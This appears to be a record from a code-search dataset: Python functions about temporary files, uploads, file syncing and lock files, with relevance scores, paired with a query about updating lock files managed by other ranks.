"def _create_file_if_needed(self):\n if not os.path.exists(self._file.filename()):\n old_umask = os.umask(0o177)\n try:\n open(self._file.filename(), 'a+b').close()\n finally:\n os.umask(old_umask)",
"def create(self):\n self.create_file()",
"def upload_location(instance, filename):\n new_id = randint(0, 1000)\n return \"%s/%s\" % (new_id, filename)",
"def _get_tmp_file_path(self):\n return os.path.join(self.tmp_dir, self.hash)",
"def setup_by_filename(self, filename: str):\n self.filename = filename if filename is not None else \"tmp\"\n self.save_file = mcpython.common.world.SaveFile.SaveFile(self.filename)",
"def write_temp_file_to_path(suffix, content, file_path):\n temp_file = NamedTemporaryFile(suffix=suffix)\n temp_file.write(content)\n temp_file.seek(0)\n export_filename = default_storage.save(file_path, File(temp_file, file_path))\n temp_file.close()\n\n return export_filename",
"def generate_temp_filename(self):\n prefix = self.generate_filename_prefix()\n now = datetime.now()\n # Ok that might not be the best timestamp system, but it's\n # enough for our needs.\n timestamp = '-'.join([\n ''.join([str(x) for x in now.timetuple()]),\n str(now.microsecond),\n str(randint(10000, 99999))])\n\n filename = prefix + timestamp\n return find_filename(self.tempdir,\n filename)",
"def save_phantom(self, file_or_fname):\n pass",
"def test_is_special_file_socket(mocker: MockerFixture, tmp_path: Path) -> None:\n mocker.patch(\"stat.S_ISSOCK\", return_value=True)\n tmp_file = tmp_path / \"foo\"\n tmp_file.touch()\n assert is_special_file(tmp_file)",
"def temporary_unsupported_image(self):\n image = Image.new('RGB', (1, 1))\n tmp_file = tempfile.NamedTemporaryFile(suffix='.ppm')\n image.save(tmp_file, 'ppm')\n # important because after save(),\n # the fp is already at the end of the file\n tmp_file.seek(0) # retrieves the created temp file\n return tmp_file",
"def copy_tmp_file(self, dst):\n if dst and self.file_exists(self.tmp_file):\n shutil.copyfile(self.tmp_file, dst)",
"def reg_file(self, file_op):\n self._context.file_handler.add_file(file_op.name,\n file_op.address, file_op.size)",
"def test_file_exists(self):\n with TemporaryDirectory() as tmp:\n # define path to file\n fp = os.path.join(tmp, \"asdf.txt\")\n\n # write atomically to file\n with atomic_write(fp, \"w\") as f:\n f.write(\"asdf\")\n\n # ensure file exists\n assert os.path.exists(fp)\n\n # ensure atomic_write to same file raises an error as it already exists\n try:\n with atomic_write(fp, \"w\") as f:\n f.write(\"asdf\")\n except FileExistsError as e:\n self.assertIsInstance(e, FileExistsError)",
"def _generate_to_tempfile(self, generator):\r\n (output_fd, output_path) = tempfile.mkstemp()\r\n with os.fdopen(output_fd, 'w') as output:\r\n generator.write(output)\r\n return output_path",
"def put_object(local_path: str, file_name: str, configuration):\n pass",
"def upload(self, remote, local, force = False):\n fl = self.list([ remote ])\n if force == False and remote in fl:\n remote_hash = fl[remote]\n h = hashlib.sha256()\n commonl.hash_file(h, local)\n if remote_hash == h.hexdigest():\n # remote hash is the same, no need to upload\n return\n\n with io.open(local, \"rb\") as inf:\n self.target.ttbd_iface_call(\"store\", \"file\", method = \"POST\",\n file_path = remote,\n files = { 'file': inf })",
"def single_file_write(self, file_pointer, filename):\n temp_file = \"resources/temp_file\"\n\n file_pointer.seek(0)\n with open(temp_file, \"wb\") as output_file:\n shutil.copyfileobj(file_pointer, output_file)\n\n os.rename(temp_file, filename)\n log.info(\"Saved file: %s\", filename)",
"def test_file_conflict(self):\n dir0, dir1 = self.make_temp_dirs(2)\n self.write_file(dir0, \"foo\")\n self.sync_all()\n\n self.write_file(dir0, \"foo\", \"bar\")\n time.sleep(0.1)\n self.write_file(dir1, \"foo\", \"baz\")\n self.sync_all()\n # File with later mtime wins\n self.assertFile(dir0, \"foo\", \"baz\")\n self.assertFile(dir1, \"foo\", \"baz\")",
"def _create_temp_files():\n\n fakes = {}\n for i in [\"domain\", \"problem\"]:\n q, fname = tempfile.mkstemp()\n os.close(q)\n fakes[i] = fname\n return fakes",
"def write_to_filepath(tmp_str, path='./temp_model111.py', create_dir=True):\n if create_dir:\n # create dir if not exists\n directory = os.path.dirname(path)\n if not os.path.exists(directory):\n os.makedirs(directory)\n with open(path, 'w') as f:\n f.write(tmp_str)\n f.close()",
"def temporary(cls):\n fh, path = tempfile.mkstemp(suffix='.hdf5')\n os.close(fh)\n self = cls(path, 'w')\n self.path = path\n return self",
"def overwrite_on_tape_topology(rse_factory, did_factory, root_account, vo, file_factory):\n\n rse1 = 'XRD1'\n rse1_id = rse_core.get_rse_id(rse=rse1, vo=vo)\n rse2 = 'XRD3'\n rse2_id = rse_core.get_rse_id(rse=rse2, vo=vo)\n rse3 = 'XRD4'\n rse3_id = rse_core.get_rse_id(rse=rse3, vo=vo)\n\n def __generate_and_upload_file(src_rse, dst_rse, simulate_dst_corrupted=False):\n \"\"\"\n Create and upload real files to source and destination. Don't register it on destination. This way, fts will fail if overwrite = False\n\n If simulate_dst_corrupted is True, will upload a different file to destination, to simulate that it is corrupted\n \"\"\"\n local_file = file_factory.file_generator()\n did = did_factory.random_file_did()\n did_factory.upload_test_file(src_rse, path=local_file, **did)\n did_factory.upload_client.upload(\n [\n {\n 'path': file_factory.file_generator(size=3) if simulate_dst_corrupted else local_file,\n 'rse': dst_rse,\n 'did_scope': did['scope'].external,\n 'did_name': did['name'],\n 'no_register': True,\n }\n ]\n )\n return did\n\n def __create_dids(did1_corrupted=True, did2_corrupted=True):\n \"\"\"\n Uploads two files:\n - one which requires multiple transfer hop to go to destination\n - one which can be transferred in one hop to destination rse\n \"\"\"\n # multihop transfer:\n did1 = __generate_and_upload_file(rse1, rse3, simulate_dst_corrupted=did1_corrupted)\n # direct transfer\n did2 = __generate_and_upload_file(rse2, rse3, simulate_dst_corrupted=did2_corrupted)\n rule_core.add_rule(dids=[did1, did2], account=root_account, copies=1, rse_expression=rse3, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)\n\n return rse1_id, rse2_id, rse3_id, did1, did2\n\n # Fake that destination RSE is a tape\n rse_core.update_rse(rse_id=rse3_id, parameters={'rse_type': RSEType.TAPE})\n try:\n rse_core.add_rse_attribute(rse3_id, 'archive_timeout', 60)\n yield __create_dids\n finally:\n rse_core.update_rse(rse_id=rse3_id, parameters={'rse_type': RSEType.DISK})\n rse_core.del_rse_attribute(rse3_id, 'archive_timeout')",
"def write_file(text):\n\n\ttempfile.tempdir = UPLOAD_FOLDER\n\ttemp_file = tempfile.NamedTemporaryFile(delete=False, suffix='.txt')\n\n\ttext = text.encode('utf8')\n\n\twith open(temp_file.name, 'w') as temp:\n\t\ttemp.write(text)\n\n\tpathparts = (temp.name).split('/')\n\tpath = \"/\".join(pathparts[5:])\n\n\t#returns the temporary file path\n\treturn path",
"def create(self):\n self.file = open(self.filename, \"xb\", buffering=self.bufferSize)",
"def setup(self, tmp_path):\n create_users_file(tmp_path)\n create_jobs_file(tmp_path)",
"def copy_to_temp(object):\n temp_file = NamedTemporaryFile(delete=False)\n _copy_and_close(object, temp_file)\n return temp_file.name",
"def temporary_file_path(self):\n return self.file.name"
] | [
"0.7100669",
"0.6645065",
"0.6373811",
"0.60678446",
"0.59707797",
"0.5943573",
"0.5882913",
"0.5867154",
"0.5833076",
"0.57806534",
"0.5745454",
"0.5718152",
"0.5706169",
"0.5704879",
"0.56752044",
"0.56738895",
"0.56596625",
"0.56512666",
"0.56443375",
"0.56338364",
"0.56253743",
"0.56225497",
"0.5620132",
"0.5610537",
"0.5586419",
"0.5562855",
"0.55558413",
"0.55427134",
"0.5532904",
"0.5532109",
"0.55254203",
"0.5525001",
"0.55085677",
"0.5489739",
"0.5481336",
"0.5473111",
"0.5463623",
"0.5453448",
"0.545341",
"0.54359114",
"0.5426227",
"0.5402361",
"0.53983796",
"0.5393666",
"0.53884816",
"0.53862584",
"0.5384232",
"0.53800285",
"0.5375829",
"0.5370097",
"0.53638196",
"0.531574",
"0.5303943",
"0.5296912",
"0.52637106",
"0.5261531",
"0.5227572",
"0.52219665",
"0.52168375",
"0.52122164",
"0.52093935",
"0.5199922",
"0.5198399",
"0.51956034",
"0.5192308",
"0.5190126",
"0.5187911",
"0.5173791",
"0.5168145",
"0.5164067",
"0.51609015",
"0.5160006",
"0.5156307",
"0.5153519",
"0.51421183",
"0.5132835",
"0.51276386",
"0.51273733",
"0.51223356",
"0.51035064",
"0.508573",
"0.5084667",
"0.50846666",
"0.5080947",
"0.5078096",
"0.50762635",
"0.5072508",
"0.506375",
"0.5057118",
"0.5055892",
"0.50497925",
"0.504674",
"0.50453293",
"0.50450844",
"0.50387776",
"0.5035982",
"0.5035761",
"0.503555",
"0.50238425",
"0.502034"
] | 0.66906744 | 1 |
Add the lock files listed in lock_files to the list of lock files managed by other ranks. | def _update_lock_files(self, lock_files):
_, _lock_file, _other_lock_files = _temporary_files[
self._subarray._partition_file
]
_other_lock_files.update(set(lock_files))
if _lock_file in _other_lock_files:
# If the lock file managed by this rank is in the list of
# lock files managed by other ranks, remove it from there
_other_lock_files.remove(_lock_file) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def LockFiles(self, entries):\n self._model.lock(entries)",
"def add_mock_files(self, file_list):\n self._mock_file_list.extend(file_list)",
"def thread_file_list(self):\n # Establish connection for this thread\n connection = self.connect()\n\n # Set working directory on server\n connection.chdir(self.settings.server_dir)\n\n while len(self.files) > 0:\n self.lock.acquire()\n file = self.files.pop()\n self.lock.release()\n\n # Pass popped file to function\n try:\n self.upload_file(connection, file)\n except EOFError as error:\n self._logger.log(logging.CRITICAL, \"Connection lost during \"\n \"file transfer\")\n self._logger.log(logging.CRITICAL, str(error))\n\n # Establish connection for this thread\n connection = self.connect()\n\n # Set working directory on server\n connection.chdir(self.settings.server_dir)\n\n # Lock and append filename to list to retry\n self.lock.acquire()\n self.files.append(file)\n self.lock.release()\n\n except FileNotFoundError as error:\n self._logger.log(logging.CRITICAL, \"File \" + file + \" not \"\n \"found\")\n self._logger.log(logging.CRITICAL, str(error))\n\n except IOError:\n self.lock.acquire()\n self.files.append(file)\n self.lock.release()\n\n connection.close()",
"def get_file_list(self):\n try:\n for filename in os.listdir(SHARED_DIR):\n self.file_list.append(filename)\n except Exception as e:\n print \"Error: retriving file list, %s\" % e",
"def _distribute_files(self, distribution='one'):\n for k, files in self.file_lists.items():\n self.idle[k] = False\n if distribution.lower() == 'single':\n self.distribution_comms[k] = None\n if self.comm.rank >= 1:\n self.local_file_lists[k] = None\n self.idle[k] = True\n else:\n self.local_file_lists[k] = files\n elif distribution.lower() == 'even':\n if len(files) <= self.comm.size:\n if self.comm.rank >= len(files):\n self.local_file_lists[k] = None\n self.distribution_comms[k] = None\n self.idle[k] = True\n else:\n self.local_file_lists[k] = [files[self.comm.rank],]\n self.distribution_comms[k] = self.comm.Create(self.comm.Get_group().Incl(np.arange(len(files))))\n else:\n files_per = int(np.floor(len(files) / self.comm.size))\n excess_files = int(len(files) % self.comm.size)\n if self.comm.rank >= excess_files:\n self.local_file_lists[k] = list(files[int(self.comm.rank*files_per+excess_files):int((self.comm.rank+1)*files_per+excess_files)])\n else:\n self.local_file_lists[k] = list(files[int(self.comm.rank*(files_per+1)):int((self.comm.rank+1)*(files_per+1))])\n self.distribution_comms[k] = self.comm",
"def removeLocks():\n global lockFnames\n for lockFname in lockFnames:\n if isfile(lockFname):\n logging.debug('Removing lockfile %s' % lockFname)\n os.remove(lockFname)\n\n lockFnames = []",
"def pipfile_lock_names(self):\n return ext_split(self.pipfile_locks, \"Pipfile.lock\")",
"def add_filelist_to_cache(self, file_list=None):\n if file_list is None:\n return False\n for fileinfo in file_list:\n fn_ = fileinfo.filename\n self.cache_file_list_dict[fn_] = fileinfo\n return True",
"def add(self, files, mask):\n pass",
"def _assignUIDs(self):\n for messagePath in self.maildir:\n\n messageFile = os.path.basename(messagePath)\n\n if not messageFile in self.metadata['uids']:\n\n self.metadata['uids'][messageFile] = self.metadata['uidnext']\n\n self.metadata['uidnext'] += 1\n\n self.saveMetadata()",
"def add_mock_files_after_load(self, file_list):\n self._mock_file_list_after.extend(file_list)",
"def add_files(self, files, commit_msg):\n paths = []\n for rpath in files:\n path = os.path.join(self.repodir, rpath)\n paths.append(path)\n with open(path, 'w') as f:\n f.write(files[rpath])\n if paths:\n self.git_cmd(['add'] + paths)\n self.commit(commit_msg)",
"def lock(self):\n logging.debug(\"Locking %s (and subdirectories)\" % self.directory)\n LOCK_ACL.append(target=self.directory)\n for subdirectory in self._subdirectories():\n LOCK_ACL.append(target=subdirectory)",
"def create_files(self):\n self._do_action_under_lock(self._create_files)",
"def _save_sync_list(self):\n\t\tfp = open(self.sync_file, 'w')\n\t\tself.sync_list.write(fp)\n\t\tfp.close()",
"def _find_locked_by(self):\n fstat_flags = NTR('otherLock | otherOpen0 & headType=*+l')\n any_locked_files = {} # depot_path : user\n for branch_chunk in self.ctx.iter_writable_branch_chunks():\n # Skip any newly defined branches: they're new, won't contain any\n # files yet, and won't get a view definition until later at per-\n # commit preflight time.\n bvl = [b for b in branch_chunk if b.view_lines]\n if not bvl:\n continue\n with self.ctx.switched_to_union(bvl):\n r = self.ctx.p4run('fstat', '-F', fstat_flags, '-m1',\n '//{}/...'.format(self.ctx.p4.client),\n log_warnings=logging.DEBUG)\n # Collect a dictionary of the locked files from the writable union of branch views\n for lf in r:\n user = lf['otherOpen'][0] if 'otherOpen' in lf else NTR('<unknown>')\n any_locked_files[lf['depotFile']] = user\n return any_locked_files",
"def add_list(self, files):\n if files:\n if not list:\n self.set_list(files)\n else:\n self.playlist.extend(files)",
"def cmd_sync(self, args, list_only=False):\n if not list_only:\n log.info('synchronizing repository files...')\n for curdir, dirs, files in os.walk(self.files_path):\n for f in files:\n ignore_file = False\n repo_path = os.path.join(curdir, f).replace(self.files_path, '')\n for ignored in self.ignored_files:\n if ignored.startswith('/'):\n f = os.path.join(repo_path, f)\n if fnmatch(f, ignored):\n log.debug('ignored file ({}): {}'.format(ignored, repo_path[1:]))\n ignore_file = True\n break\n if ignore_file:\n continue\n fpath = os.path.join(curdir, f)\n linkpath = fpath.replace(self.files_path, self.homedir)\n if not os.path.exists(linkpath) and not os.path.islink(linkpath):\n log.info('synced: {}'.format(linkpath))\n if not list_only:\n log.debug('creating link: {}'.format(linkpath))\n os.symlink(fpath, linkpath)\n else:\n if os.path.islink(linkpath):\n # target path already exists\n frealpath = os.path.realpath(linkpath)\n if frealpath != fpath:\n log.warning('conflict (wrong link): {} -> {}'.format(linkpath, frealpath))\n if not list_only:\n if not args.force:\n if not log.ask_yesno('overwrite existing link?', default='n'):\n continue\n log.debug('installing link in place of existing link: {}'.format(linkpath))\n os.unlink(linkpath)\n os.symlink(fpath, linkpath)\n else:\n log.info('OK: {}'.format(linkpath))\n else: # linkpath is a regular file\n log.warning('conflict (file already exists): {}'.format(linkpath))\n if not list_only:\n if not args.force:\n if not log.ask_yesno('overwrite existing file?', default='n'):\n continue\n log.debug('installing link in place of existing file: {}'.format(linkpath))\n os.unlink(linkpath)\n os.symlink(fpath, linkpath)\n log.info('done')",
"def loadFileList(self):\r\n try:\r\n data = open(self.filelist_file, 'rb')\r\n except IOError:\r\n '''print \"No SRTM cached file list. Creating new one!\"'''\r\n if self.offline == 0:\r\n self.createFileList()\r\n return\r\n try:\r\n self.filelist = pickle.load(data)\r\n except:\r\n '''print \"Unknown error loading cached SRTM file list. Creating new one!\"'''\r\n if self.offline == 0:\r\n self.createFileList()",
"def add_files(self, filenames):\n for filename in filenames:\n self.add_file(filename)",
"def half_sync(self,delay):\n self.count = 1\n while not self.shutdown and self.loggedin.autosync:\n time.sleep(delay)\n self.count += 1\n self.filelist = self.loggedin.list()\n print \"Pinged server for changes\"\n self.synced = []\n if self.filelist:\n for f in self.filelist:\n path = self.loggedin.sanitize_path(f['path'])\n path = os.path.join(self.onedirrectory, path)\n if not os.path.exists(path):\n os.makedirs(path)\n if f['name'] and not self.loggedin.exists(f):\n exists, data = self.loggedin.getfile(f)\n if exists:\n with open(self.loggedin.make_path(f), 'a') as new_file:\n new_file.write(data)\n new_file.close()\n elif f['name'] and str(self.loggedin.hash_file(f)) != str(f['hash']):\n self.loggedin.sendfile(f['name'], f['path'])\n if self.loggedin.make_path(f) not in self.synced:\n self.synced.append(self.loggedin.make_path(f))\n os_walk = os.walk(self.loggedin.onedirrectory)\n for directory in os_walk:\n for f in directory[2]:\n if f.startswith('.'):\n continue\n path = os.path.join(directory[0], f)\n if path not in self.synced:\n try:\n os.remove(path)\n except OSError, e:\n print (\"Error: %s - %s.\" % (e.filename,e.strerror))",
"def ingest(self, files):\n for file in files:\n self.files.add(file)",
"def updateFileList(self, fileList):\n\n if fileList == self.fileList:\n return 0\n\n self.mutex.acquire()\n # init = time.time()\n # \n # while(self.bussy):\n # sleep(0.1)\n # if time.time() - init > 2*self.period:\n # return 0\n \n self.fileList = fileList\n self.mutex.release()\n return 1",
"def update_list(self):\n\t\ttry:\n\t\t\tassert(not self.master.TransactionInProgress)\n\t\t\tself.master.Vacuum()\n\n\t\t\tself.fetch_repo_file(\"/torrent\", self.config[\"daemon\"][\"rootdir\"] + \"/torrent\", \"wb\")\n\t\t\tself.master.master = json.loads(self.fetch_repo_file(\"/package-index.json\", True).decode('utf-8'))\n\t\t\tself.torrent_info = lt.torrent_info(self.config[\"daemon\"][\"rootdir\"] + \"/torrent\")\n\n\t\t\t\"\"\" Find pre-downloaded files \"\"\"\n\t\t\tpre_downloaded = {}\n\t\t\ti = 0\n\t\t\tfor f in self.torrent_info.files():\n\t\t\t\tif self.valid_tpkg_file(f.path):\n\t\t\t\t\tpre_downloaded[i] = f\n\t\t\t\ti += 1\n\n\n\t\t\t\"\"\" Default torrent params \"\"\"\n\t\t\tparams = {\n\t\t\t\t\"save_path\": self.config[\"daemon\"][\"rootdir\"],\n\t\t\t\t\"ti\": self.torrent_info\n\t\t\t}\n\t\t\t\n\t\t\t\"\"\" Set torrent handler \"\"\"\n\t\t\tself.handler = self.ses.add_torrent(params)\n\n\t\t\t\"\"\" Set chunk priority to 0 (don't download) \"\"\"\n\t\t\tfor p in range(self.torrent_info.num_pieces()):\n\t\t\t\tself.handler.piece_priority(p, 0)\n\n\t\t\tfor i in self.torrent_info.files():\n\t\t\t\tif i in pre_downloaded:\n\t\t\t\t\tpr = self.torrent_info.map_file(i, 0, pre_downloaded[i].size)\n\t\t\t\t\tn_pieces = pr.length / self.torrent_info.piece_length() + 1\n\n\t\t\t\t\tfor p in range(self.torrent_info.num_pieces()):\n\t\t\t\t\t\tif p in range(pr.piece, pr.piece + n_pieces):\n\t\t\t\t\t\t\tself.handler.piece_priority(p, 7)\n\n\t\texcept Exception as e:\n\t\t\tsys.stderr.write(\"Failed to update package list: {0}\\n\".format(e))\n\t\t\ttraceback.print_exc()\n\t\t\tself.write_line(\"Error: XXX - Failed to update package list.\")",
"def _add_files(self, index_key, media_key,\n new_list, fundamentals):\n _index=fundamentals.get(index_key, {})\n _media=fundamentals.get(media_key, {})\n for _file in new_list:\n _data=self._item_from_index(_file, 'data', _media)\n if not _data:\n self.log('Failed to write file %s due to no data'%_file)\n continue\n if self._item_from_index(_file, None, _index) is None:\n _origin=self._item_from_index(_file, 'origin', _media)\n if _origin=='ringers':\n _path=self.protocolclass.RT_PATH\n elif _origin=='sounds':\n _path=self.protocolclass.SND_PATH\n elif _origin=='images':\n _path=self.protocolclass.PIC_PATH\n else:\n selg.log('File %s has unknown origin, skip!'%_file)\n continue\n _file_name=_path+'/'+_file\n try:\n self.writefile(_file_name, _data)\n except:\n self.log('Failed to write file '+_file_name)\n if __debug__:\n raise",
"def __add_files(self, snapshot):\n\n # Why partition()?\n # Don't delete a parent after adding its child:\n # M 100644 deba01f cookbooks/apt/README\n # D cookbooks/apt <== BUG, would also delete/omit README\n\n partitioned = p4gf_util.partition(lambda x:x.is_delete(), snapshot)\n for p4file in partitioned:\n path = self.__relative_path(p4file)\n if not path:\n continue\n if path == p4gf_const.P4GF_EMPTY_CHANGELIST_PLACEHOLDER:\n # Perforce-only artifact. Never copy this into Git.\n continue\n if p4file.is_delete():\n self.__append(\"D {0}\\n\".format(path))\n else:\n if p4file.sha1 == \"\":\n LOG.debug(\"skipping missing revision {}#{}\".format(path, p4file.revision))\n continue\n if p4file.is_x_type():\n mode = \"100755\"\n elif p4file.is_symlink():\n mode = \"120000\"\n else:\n mode = \"100644\"\n self.__append(\"M {0} {1} {2}\\n\".\n format(mode, p4file.sha1, path))",
"def addFiles(self, filePaths): \n \n for filePath in filePaths: \n self.addFile(filePath)",
"def add(self,filelist):\n\n self.ws.execute('svn add %s' % (' '.join(filelist)))",
"def add_files(self,count=None):\n message_buffer =[]\n if count is None:\n count = len(self.files)\n while count:\n count -= 1\n message_buffer.append((count,base64.b64encode(self.files.pop()),0)) # required to maintain compatibility with\n if len(message_buffer) > 9:\n self.queue.write_batch(message_buffer)\n message_buffer = []\n self.queue.write_batch(message_buffer)",
"def write_manifests( file_lists, target_dir, output_dir ):\n for i, lst in enumerate( file_lists ):\n with open( os.path.join( output_dir, \"manifest-{}.txt\".format( i ) ), \"w\" ) as fout:\n for r in lst:\n fout.write( insert_rsync_marker( r, target_dir ) + \"\\n\" )",
"def sync_dir(self):\n\n # mark the trajectories that we have seen\n trajectories = os.listdir(self.trajectory_dir)\n \n for trajectory_file in trajectories:\n\n if trajectory_file not in self.seen_trajectories:\n\n created = self.upload_trajectory(trajectory_file)\n self.seen_trajectories.add(trajectory_file)\n\n if created is True:\n print \"Total of %s solved trajectories\" % \\\n SolvedTrajectory.objects.count(), created",
"def add_files(self, paths):\n for path in paths:\n self.add_file(path)",
"def update_scores_list(list_file, score_file):\n fnames = []\n head, tail = os.path.split(score_file)\n if os.path.exists(list_file):\n with open(list_file, \"r\") as f:\n fnames = json.loads(f.read())\n if tail not in fnames:\n fnames.append(tail)\n fnames.sort()\n fnames.reverse()\n else:\n fnames.append(tail)\n\n with open(list_file, \"w\") as f:\n print \"writing %s...\" % list_file\n f.write(json.dumps(fnames))",
"def _populate_index(self):\n os.makedirs(self.cache_dir, exist_ok=True)\n local_files = glob('{}/*'.format(self.cache_dir))\n for file in local_files:\n self._add_to_index(os.path.basename(file), os.path.getsize(file))",
"def test_multiple_file_locks(tmp_path, monkeypatch):\n monkeypatch.setenv(\"RAY_TMPDIR\", str(tmp_path))\n with TempFileLock(path=\"abc.txt\"):\n with TempFileLock(path=\"subdir/abc.txt\"):\n assert RAY_LOCKFILE_DIR in os.listdir(tmp_path)\n # We should have 2 locks, one for abc.txt and one for subdir/abc.txt\n assert len(os.listdir(tmp_path / RAY_LOCKFILE_DIR)) == 2",
"def get_locker_room_assgnmnt_files_list():\n files = os.listdir(lrs_path)\n files.sort(reverse=True) # Sort list newest to oldest\n return files",
"def SetLocks(self):\n\t\tthisRun = self.RunFlag\n\t\tself.CPUTempLock = FileLock(self.BuildFilePath(thisRun, \"cpu.png\"))\n\t\tself.MEMTempLock = FileLock(self.BuildFilePath(thisRun, \"mem.png\"))\n\t\tself.SWPTempLock = FileLock(self.BuildFilePath(thisRun, \"swp.png\"))\n\t\tself.LATTempLock = FileLock(self.BuildFilePath(thisRun, \"lat.png\"))\n\t\tself.LEGTempLock = FileLock(self.BuildFilePath(thisRun, \"legenda.png\"))\n\t\tself.CPUStatLock = FileLock(self.BuildFilePath(thisRun, \"cpu_stat.png\"))\n\t\tself.MEMStatLock = FileLock(self.BuildFilePath(thisRun, \"mem_stat.png\"))\n\t\tself.SWPStatLock = FileLock(self.BuildFilePath(thisRun, \"swp_stat.png\"))\n\t\tself.LATStatLock = FileLock(self.BuildFilePath(thisRun, \"lat_stat.png\"))",
"def get_hash_curr_files(self):\n temp = None\n for f in self.file_list:\n if not os.stat(f).st_size:\n self.print_to_log('Skipping Zero Length File: ' + f)\n else:\n try:\n\n batch_file = open(f,'U')\n time_stamp = self.get_timestamp()\n temp = ['pass',\n time_stamp,\n self.get_hash(batch_file),\n '1',\n time_stamp,\n batch_file.name[batch_file.name.rfind('\\\\') + 1 :]]\n\n batch_file.close()\n self.hash_curr_files[temp[2]] = temp\n self.print_to_log(\"successfully hashed file: \" + temp[5])\n except IOError:\n self.print_to_log('Cannot Open File: ' + f)\n except:\n self.print_to_log('Unknown Error, Exiting')\n raise",
"def update(self):\n if os.path.isdir(self.full_path):\n self.file_list = os.listdir(self.full_path)\n else:\n self.file_list = []",
"def append_archive_to_already_processed_list(config: Config, file_name: str) -> None:\n with open(config.already_processed, 'a') as f:\n f.write(f\"{file_name}\\n\")",
"def addfiles(self, filelist):\r\n for tmpc in filelist:\r\n self._filelist.append(tmpc)\r\n tmp_energy=self.readenergy(filelist)\r\n for tmpdat in tmp_energy:\r\n self._energy.append(tmpdat)\r\n return tmp_energy",
"def _set_locks(locks):\n _local.entry_transaction = locks",
"def copy_unmanaged_files(self, reader):\n for entry in reader.index:\n if (\n entry.path == \"l10n.toml\"\n or entry.path.startswith(\"templates/\")\n or entry.path.startswith(\"locales/\")\n ):\n continue\n\n self.index.add(entry)",
"def updateDiskFileList(self):\n\n if self.m_curPath:\n # Get me just the files please.\n for _, _, files in os.walk(self.m_curPath):\n break\n else:\n files = []\n\n files.sort()\n if files != self.m_diskNames:\n self.m_diskNames[:] = files\n self.m_newNames[:] = []\n\n self.populateFileList()",
"def _expireReadLocks(self):\n readLockFileName = ReadLock.fileName\n for name in os.listdir(self.dir):\n if not name.startswith(readLockFileName):\n continue\n LockDir = os.path.join(self.dir, name)\n ExclusiveLock(LockDir, self.readlocktimeout).expire()",
"def handleFileNames(self):\n \n # expand the wild cards - but do not create the full directory path\n # as the work sub directories have yet to be created.\n if not os.path.exists(self.shareArea):\n m = 'Cannot set self.auxfiles due to non-existent share directory: %s' % self.shareArea\n self.logger.fatal(m)\n raise RTTCodingError(m)\n\n # resolve auxFile patterns to file names\n auxFiles = []\n for pattern in self.auxFilePatterns:\n base, fnpattern = os.path.split(pattern)\n srcDir = os.path.normpath(os.path.join(self.shareArea, base))\n filesInShare = os.listdir(srcDir)\n auxFiles.extend([os.path.join(base,file) for file in filesInShare if fnmatch.fnmatch(file, fnpattern)])\n\n self.auxFiles = unique(auxFiles)",
"def _lock_all_partitions(self, shared=False):\n pass",
"def add_files(*files):\n if _files is None:\n return\n\n for file in files:\n _files.add(file)",
"def updateCache(self):\n for root, dirs, files in os.walk(cachedFilesPath):\n for file in files:\n if file.endswith(cachedFileExtensionSuffix):\n path = os.getcwd()+'/'+cachedFilesPath+file\n with open(path, mode='r') as f:\n payload_json = f.read()\n payload_obj=jsonpickle.decode(payload_json)\n r= self.upload(payload_obj)\n if isinstance(r, types.NoneType):\n #do nothing\n print(\"\")\n else:\n if r.status_code == 200 :\n #uploaded!\n if cacheArhive:\n #move it to archive\n dst=os.getcwd()+'/'+cachedArchivePath+file\n shutil.move(path, dst)\n print(\"archived log: \", file)\n else:\n #delete it\n os.remove(path)",
"def _add_paths_to_queue(self, file_paths_to_enqueue: list[str], add_at_front: bool):\n new_file_paths = list(p for p in file_paths_to_enqueue if p not in self._file_path_queue)\n if add_at_front:\n self._file_path_queue.extendleft(new_file_paths)\n else:\n self._file_path_queue.extend(new_file_paths)\n Stats.gauge(\"dag_processing.file_path_queue_size\", len(self._file_path_queue))",
"def _update_cfg_from_files(self, files):\n\t\tfor file in files:\n\t\t\twith open(self.SettingsFolder + file) as f:\n\t\t\t\tself._add_cfg_to_list(file[:-4], yaml.load(f))",
"def resortFiles(fileList):\n if fileList is None or not len(fileList):\n print \"SRT:nofiles in the dictionary.\"\n sys.exit()\n\n new_file_list = list()\n for f in fileList:\n new_file_list.append(PFileStat(dir_source, f, os.lstat(dir_source + \"/\" + f)))\n\n new_file_list.sort(key=lambda i: i.st_mtime)\n return new_file_list",
"def create_modad_lock(self):\n\n Logger.create_lock_file()\n\n with open(\"modad.lock\", \"w\") as file:\n file.write(json.dumps(self.commit_hashes))",
"def load_installed_file_list(self):\n listpath = os.path.join(self._build_root, 'src', 'gromacs', 'installed-headers.txt')\n with open(listpath, 'r') as installedfp:\n for line in installedfp:\n path = line.strip()\n if not os.path.isabs(path):\n self._reporter.input_error(\n \"installed file not specified with absolute path: {0}\"\n .format(path))\n continue\n relpath = self._get_rel_path(path)\n if relpath not in self._files:\n self._reporter.input_error(\n \"installed file not in source tree: {0}\".format(path))\n continue\n self._files[relpath].set_installed()",
"def insertfiles(self, pos, filelist):\r\n for i in range(0, len(filelist)):\r\n self._filelist.insert(pos+i, filelist[i])\r\n tmp_energy=self.readenergy(filelist)\r\n for i in range(0, len(tmp_energy)):\r\n self._energy.insert(pos+i, tmp_energy[i])\r\n return tmp_energy",
"def sync_all_lists(self):\r\n print(\"Started syncing influencer master lists with DB\")\r\n screen_names_on_lists = []\r\n self._add_or_update(screen_names_on_lists)\r\n print(\"Removing entries which are no longer on any list\")\r\n self._delete_entries_not_in_list(screen_names_on_lists) # remove entries from DB if they are on no list\r\n print(\"Sync complete\")",
"def AddInitiators(self, initiatorList):\n # Append the IQNs to the existing list\n full_iqn_list = self.initiators\n for iqn in initiatorList:\n if iqn.lower() in full_iqn_list:\n mylog.debug(iqn + \" is already in group \" + self.name)\n else:\n full_iqn_list.append(iqn)\n\n # Modify the VAG on the cluster\n params = {}\n params[\"volumeAccessGroupID\"] = self.ID\n params[\"initiators\"] = full_iqn_list\n libsf.CallApiMethod(self.mvip, self.username, self.password, \"ModifyVolumeAccessGroup\", params, ApiVersion=5.0)",
"def add(self, transfer):\n assert transfer.lock.hashlock not in self.locked\n self.locked[transfer.lock.hashlock] = transfer\n self._cached_lock_hashes.append(sha3(transfer.lock.as_bytes))\n self._cached_root = None",
